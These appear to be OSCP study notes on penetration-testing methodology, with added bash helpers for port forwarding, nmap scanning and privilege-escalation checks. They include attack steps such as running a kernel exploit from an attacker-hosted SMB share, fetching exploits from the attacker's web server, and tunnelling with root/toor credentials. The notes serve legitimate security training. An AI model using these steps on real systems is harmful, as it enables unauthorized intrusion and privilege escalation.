Welcome to my learning notes for OSCP by OffensiveSecurity. I will update the materials here during my 30-day course time.
Proof commands for the proof.txt screenshot (Windows, then Linux; the Windows path contains spaces, so it has to be quoted or `type` reads the wrong file):
hostname && whoami && type "C:\Documents and Settings\Administrator\Desktop\proof.txt" && ipconfig /all
hostname && whoami && cat /root/proof.txt && /sbin/ifconfig
Find running services that listen on loopback only (local address 127.0.0.1 or ::1 with state LISTENING/LISTEN); on Windows:
netstat -ano
For example, if MySQL is found listening locally on 3306, use plink.exe on the victim to remote-forward that port to our machine. plink is an SSH client, so Kali must run an SSH server the victim can reach, and -R opens the listening port on the server (Kali) side:
C:\Windows\Temp> plink.exe -l root -pw toor -R 3306:
Then, in Kali, interact with the database through the forwarded port (-h 127.0.0.1 forces a TCP connection; without it the mysql client tries the local Unix socket and never touches the tunnel):
root@kali:~/#: mysql -h 127.0.0.1 -P 3306 -u root -p
plink.exe can be downloaded from: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
The same result can be reached with the ssh client's local port forwarding (-L), which opens the listening port on the machine running the ssh client rather than on the SSH server:
alice@victimmachine:~/#: ssh -L 3306: root@
Other techniques (remote port forwarding with -R, dynamic SOCKS forwarding with -D, and the sshuttle tool) are useful in some cases :)
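The two steps above (find loopback-only listeners, then forward each one) as an added, runnable example; this is not code from the original notes. It parses netstat output for both Windows (`netstat -ano`) and Linux (`netstat -tulpn`) and prints the plink -R line from the notes, plus the equivalent ssh -L line typed on Kali. The samples are constructed, the root/toor credentials come from the notes, and `<kali-ip>`, `<victim-user>` and `<victim-ip>` are placeholders you substitute.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): pick out services that listen on
# loopback only from netstat output and print the matching port-forward commands.
# Assumptions: Kali runs an SSH server reachable from the victim as <kali-ip>
# (placeholder), and the root/toor credentials from the notes are used for plink.

# Constructed sample of `netstat -ano` from a Windows host (not real data).
sample_windows='
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       876
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       1532
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       2260
  TCP    10.11.1.22:49712       10.11.0.5:443          ESTABLISHED     2260
  TCP    [::1]:5985             [::]:0                 LISTENING       4
  UDP    0.0.0.0:5353           *:*                                    1400
'

# Constructed sample of `netstat -tulpn` from a Linux host (not real data).
sample_linux='
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      812/postgres
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      655/sshd
tcp6       0      0 ::1:6379                :::*                    LISTEN      901/redis-server
udp        0      0 0.0.0.0:68              0.0.0.0:*                           521/dhclient
'

# Read netstat output on stdin; print "port owner" for each TCP socket in
# LISTEN/LISTENING state whose local address is a loopback address.
# Sockets bound to 0.0.0.0 or a real interface are skipped: those are reachable
# directly (firewall permitting) and need no forward.
loopback_listeners() {
  awk '
    $1 ~ /^(TCP|tcp|tcp6)$/ {
      state = ""; laddr = ""
      for (i = 1; i <= NF; i++) {
        if (state == "" && ($i == "LISTENING" || $i == "LISTEN")) state = $i
        if (laddr == "" && $i ~ /:[0-9]+$/) laddr = $i   # first addr:port field is the local one
      }
      if (state == "" || laddr == "") next
      n = split(laddr, part, ":")
      port = part[n]
      host = substr(laddr, 1, length(laddr) - length(port) - 1)
      if (host ~ /^127\./ || host == "[::1]" || host == "::1")
        print port, $NF
    }'
}

# plink.exe line for the victim: remote-forward Kali's tcp/PORT to the victim's
# loopback PORT (plink, like OpenSSH, takes -R listen-port:host:port).
remote_forward_cmd() {
  printf 'plink.exe -l root -pw toor -R %s:127.0.0.1:%s <kali-ip>\n' "$1" "$1"
}

# Equivalent OpenSSH local forward, typed on Kali when the victim runs sshd:
# -L binds PORT on the ssh client (Kali) and tunnels it to the victim's loopback.
local_forward_cmd() {
  printf 'ssh -L %s:127.0.0.1:%s <victim-user>@<victim-ip>\n' "$1" "$1"
}

# Read netstat output on stdin and print one plink forward per loopback listener.
suggest_forwards() {
  loopback_listeners | while read -r port owner; do
    printf '# %s (%s)\n' "$port" "$owner"
    remote_forward_cmd "$port"
  done
}

printf '%s\n' "$sample_windows" | suggest_forwards
printf '%s\n' "$sample_linux" | suggest_forwards
```

On a real target, replace the samples with `netstat -ano | suggest_forwards` (after copying the output over) and then connect on Kali with `mysql -h 127.0.0.1 -P 3306`, as in the notes; the loopback check is what keeps you from forwarding ports you could have reached directly.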
If I had a remote desktop session, I used the following command to mount a shared folder into it:
root@kali:~/#: rdesktop -r disk:share=/home/bayo/store
In Kali, use Impacket to create a local SMB share (the path given is exposed to anyone who can reach port 445, so prefer a directory holding only the payloads over sharing /; recent Windows hosts have SMB1 disabled and need the -smb2support flag):
root@kali:~/#: python /usr/share/impacket/examples/smbserver.py MyShare /
On the victim machine, execute the payload straight from the share:
C:\> \\\MyShare\exploit_kernerl.exe
On my Kali machine, start the Python SimpleHTTPServer on port 8080 (Python 2; the Python 3 module is http.server):
root@kali:~/#: python -m SimpleHTTPServer 8080
Then use PowerShell on a Windows victim, or wget/curl on Linux, to download the exploit from that port.
- Ports & services enumeration using nmap
root@kali:~/#: nmap -sV -sC -p- <IP>
root@kali:~/#: nmap -sU --top-ports=50 <IP>
root@kali:~/#: nmap --script 'smb-vuln-*' <IP> (quoted so the shell does not expand the glob)
root@kali:~/#: nmap -sV -T4 -p- <IP> (quick method: version detection over all ports, no scripts)
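The quick full-port scan and the -sC/-sV scan above combine into a common two-phase workflow: scan all 65535 ports fast with grepable output, parse out the open ones, and run scripts and version detection only against those. The following is an added example, not code from the original notes; the nmap -oG output is constructed and the IP 10.11.1.22 is a placeholder.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): two-phase scanning. A fast full-port
# scan with grepable output (-oG) finds the open ports; those are parsed out and fed
# to a second scan that runs version detection and default scripts only against them,
# so -sC/-sV do not have to crawl all 65535 ports.

# Constructed sample of `nmap -p- -T4 -oG quick.gnmap 10.11.1.22` output (not real data).
sample_gnmap='# Nmap 7.91 scan initiated as: nmap -p- -T4 -oG quick.gnmap 10.11.1.22
Host: 10.11.1.22 ()     Status: Up
Host: 10.11.1.22 ()     Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 3306/closed/tcp//mysql///, 8080/open/tcp//http-proxy///     Ignored State: filtered (65531)
# Nmap done -- 1 IP address (1 host up) scanned in 42.17 seconds'

# Read grepable nmap output on stdin; print the open TCP ports as a comma list.
# Each entry is port/state/proto/owner/service/rpc/version/; closed, filtered and
# UDP entries are dropped so the second phase only touches what answered.
open_ports() {
  awk -F'Ports: ' '/Ports: / {
    n = split($2, entry, ", ")
    for (i = 1; i <= n; i++) {
      split(entry[i], f, "/")
      if (f[2] == "open" && f[3] == "tcp")
        ports = ports (ports == "" ? "" : ",") f[1]
    }
  } END { print ports }'
}

# Build the targeted second-phase command for the IP in argument 1 from the
# quick scan's grepable output on stdin. Fails if nothing was open.
targeted_scan_cmd() {
  ports=$(open_ports)
  [ -n "$ports" ] || { echo "no open TCP ports in quick scan" >&2; return 1; }
  printf 'nmap -sV -sC -p %s -oA targeted_%s %s\n' "$ports" "$1" "$1"
}

# Real usage (runs nmap, so shown as a comment):
#   nmap -p- -T4 -oG quick.gnmap <IP> && targeted_scan_cmd <IP> < quick.gnmap | sh
printf '%s\n' "$sample_gnmap" | targeted_scan_cmd 10.11.1.22
```

The -oA in the generated command keeps normal, grepable and XML output of the targeted scan, which is what you want to paste into the report later.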
- Enumerate web applications
root@kali:~/#: gobuster dir -u <url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
root@kali:~/#: nikto -h <url>
- Post exploitation
After gaining initial access, upgrade to a full TTY shell, then run one of the following scripts to enumerate the host:
- PowerUp (Windows) - /~https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
- JAWS (Windows) - /~https://github.com/411Hall/JAWS
- LinEnum.sh (Linux) - /~https://github.com/rebootuser/LinEnum
- LSE (Linux) - /~https://github.com/diego-treitos/linux-smart-enumeration
If none of them works, move to manual search.
- Privilege escalation
Perform privilege escalation according to the attack vector found during enumeration.
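For the "manual search" fallback on Linux, here is an added example of the checks a practitioner runs by hand when none of the scripts above can be uploaded or executed. It is not code from the original notes or from any of the linked projects; the sudo -l and /etc/crontab samples are constructed, and `/usr/local/bin/backup.sh` and the user `alice` are made-up names.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): a few manual Linux privilege-escalation
# checks as small functions. Each prints its findings so output can be grepped or piped
# into the next check. Run them as the low-privilege user: as root, -w is always true.

# Constructed `sudo -l` output (not real data).
sample_sudo='Matching Defaults entries for alice on victim:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on victim:
    (ALL : ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/systemctl restart nginx'

# Constructed /etc/crontab (not real data).
sample_crontab='# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /usr/local/bin/backup.sh
0 3     * * *   alice   /home/alice/cleanup.sh'

# 1. Writable directories in a PATH-style string (argument 1). A writable entry in the
#    PATH of a cron job or sudo rule that calls commands by bare name lets you plant a
#    binary that runs with that user's privileges.
writable_path_dirs() {
  printf '%s\n' "$1" | tr ':' '\n' | while read -r d; do
    [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ] && printf '%s\n' "$d"
  done
  return 0
}

# 2. Setuid/setgid executables under a directory (argument 1, default /). Compare the
#    list with a stock install; anything unusual is a candidate for abuse.
suid_binaries() {
  find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# 3. Commands that `sudo -l` (read from stdin) allows without a password.
nopasswd_sudo() {
  sed -n 's/.*NOPASSWD:[[:space:]]*//p'
}

# 4. First word of every command that /etc/crontab-format input (stdin) runs as root.
#    Relative names here are resolved through the crontab PATH (check 1); absolute
#    paths should be checked for write access (check 5).
root_cron_scripts() {
  awk '$1 !~ /^#/ && NF >= 7 && $6 == "root" { print $7 }'
}

# 5. Filter a list of paths (stdin) down to the ones the current user can write to.
writable_only() {
  while read -r p; do [ -e "$p" ] && [ -w "$p" ] && printf '%s\n' "$p"; done
  return 0
}

# Run everything against the samples and the live filesystem.
echo "## writable PATH dirs";      writable_path_dirs "$PATH"
echo "## setuid/setgid binaries";  suid_binaries /usr
echo "## NOPASSWD sudo";           printf '%s\n' "$sample_sudo" | nopasswd_sudo
echo "## root cron commands";      printf '%s\n' "$sample_crontab" | root_cron_scripts
echo "## writable root cron targets"
printf '%s\n' "$sample_crontab" | root_cron_scripts | writable_only
```

Swap the samples for `sudo -l` and `cat /etc/crontab` on the target; a NOPASSWD entry or a writable root cron script is the "attack vector" the last line of the notes refers to.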